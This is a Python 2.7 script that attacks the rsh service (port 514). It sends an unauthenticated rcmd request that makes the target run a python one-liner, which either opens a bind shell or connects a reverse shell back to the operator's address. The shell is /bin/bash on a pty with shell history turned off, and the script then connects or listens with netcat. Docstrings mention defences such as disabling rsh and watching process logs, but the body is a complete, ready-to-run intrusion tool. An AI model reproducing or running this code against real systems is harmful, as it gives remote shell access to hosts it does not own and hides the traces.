#!/usr/bin/python2.7
#Rsh Shell
import sys
import socket
import random
import time
import subprocess
import signal
# Module-level TCP socket shared by RunBindShell() and RunReverseShell(): each
# binds it to the local port `myport` and connects it to port 514 on the target.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
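def getNetworkIp():
    """Return the local IPv4 address the OS selects for outbound traffic.

    Connecting a UDP socket only picks a route and source address; no
    datagram is sent. Resolving 'www.google.com' does issue a DNS lookup,
    so the call fails (socket.error / socket.gaierror) without name
    resolution or a route.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.connect(('www.google.com', 0))
        return probe.getsockname()[0]
    finally:
        # The probe socket was previously never closed; release the
        # descriptor on both the success and the error path.
        probe.close()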
def RunBindShell():
    """Send an rsh request that starts a listening shell, then attach with nc.

    Reads the module globals host, fromuser, username, myport and bindport,
    and uses the shared TCP socket ``s``.

    Bytes written to 514/tcp: a lone NUL, then
    ``fromuser NUL username NUL command NUL``. This is the rsh (rcmd)
    request layout: empty stderr-port field, client user, server user,
    command. No password or key is exchanged; the service decides on the
    client's source address, its reserved source port and .rhosts /
    hosts.equiv trust. Disabling rsh/rlogin/rexec and removing those trust
    files closes this path.

    What the target shows when the command runs: a child of the rsh daemon
    executing ``python -c``, a listener on 0.0.0.0 at ``bindport``
    (5000-5999), and /bin/bash on a pty with HISTFILE=/dev/null. Shell
    history is therefore not written, so process and audit logs are the
    evidence to rely on.
    """
    command_template = 'python -c "import os,pty,socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind((\'0.0.0.0\', %s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');s.close()"'
    remote_command = command_template % (bindport)

    # Fixed local source port first, then the rsh service port on the target.
    local_endpoint = ('0.0.0.0', myport)
    rsh_endpoint = (host, 514)
    s.bind(local_endpoint)
    s.connect(rsh_endpoint)

    # Empty stderr-port field, followed by the three NUL-terminated fields.
    request = "%s\0%s\0%s\0" % (fromuser, username, remote_command)
    s.send("\0")
    s.send(request)

    # Short pause, then read (and discard) whatever the service answered.
    time.sleep(0.5)
    s.recv(1024)
    s.close()

    banner = 'Using Netcat To Connect To %s On Port %s\nType Exit Into The Shell Properly Kill The Open Port\n----------------------------------------------------'
    print(banner % (host, bindport))
    nc_argv = ['nc', str(host), bindport]
    subprocess.call(nc_argv)
def RunReverseShell():
    """Send an rsh request that makes the target connect back, then listen with nc.

    Prompts for the callback address (auto-detected via getNetworkIp() or
    typed in), and reads the module globals host, fromuser, username, myport
    and bindport plus the shared TCP socket ``s``.

    The request written to 514/tcp has the same layout as in RunBindShell:
    a lone NUL, then ``fromuser NUL username NUL command NUL``, with no
    password or key involved.

    What the target shows when the command runs: a child of the rsh daemon
    executing ``python -c``, an outbound TCP connection to the callback
    address on ``bindport`` (5000-5999), and /bin/bash on a pty with
    HISTFILE=/dev/null. Egress filtering and process-lineage logging are
    the controls that surface this.
    """
    answer = raw_input('Get Ip Automatically? y/n:')
    if answer.lower() != "y":
        localip = raw_input('Type Your Ip For Reverse Connection:')
        # NOTE(review): the listing lost its indentation; this message is
        # assumed to belong to the manual-entry branch. Confirm upstream.
        print("Ip Changed To %s" % (localip))
    else:
        localip = getNetworkIp()

    command_template = 'python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'%s\',%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');s.close()"'
    remote_command = command_template % (localip, bindport)

    # Fixed local source port first, then the rsh service port on the target.
    local_endpoint = ('0.0.0.0', myport)
    rsh_endpoint = (host, 514)
    s.bind(local_endpoint)
    s.connect(rsh_endpoint)

    # Empty stderr-port field, followed by the three NUL-terminated fields.
    request = "%s\0%s\0%s\0" % (fromuser, username, remote_command)
    s.send("\0")
    s.send(request)

    banner = 'Using Netcat To Listen To On Port %s\nType Exit Into The Shell Properly Kill The Open Port\n----------------------------------------------------'
    print(banner % bindport)
    nc_argv = ['nc', '-lp', bindport]
    subprocess.call(nc_argv)

    # The rsh control connection is only drained and closed once nc returns.
    time.sleep(0.5)
    s.recv(1024)
    s.close()
# Script entry: three positional arguments are required (target, client-side
# user name, server-side user name).
if len(sys.argv) < 4:
    print("Example ./rsh.py 10.10.10.10(ip) foobar(fromuser) foobar(username)")
    sys.exit()

host, fromuser, username = sys.argv[1:4]

# Local source port for the rsh connection, drawn from 600-899. rsh daemons
# accept only reserved (<1024) client ports, and that port check plus
# .rhosts / hosts.equiv is all the client authentication the protocol has.
myport = random.randrange(600, 900)

# Port used for the shell session itself (5000-5999), kept as a string because
# it is interpolated into the command and passed to nc as an argument.
bindport = str(random.randrange(5000, 6000))

payloadtype = raw_input('------------------------\n1.)Reverse Shell \n2.)Bind Shell\n------------------------\nChoose Your Option:')

# Menu dispatch: "1" -> reverse shell, "2" -> bind shell, anything else exits.
handlers = {"1": RunReverseShell, "2": RunBindShell}
chosen = handlers.get(payloadtype)
if chosen is None:
    print("Invalid Option")
    sys.exit()
chosen()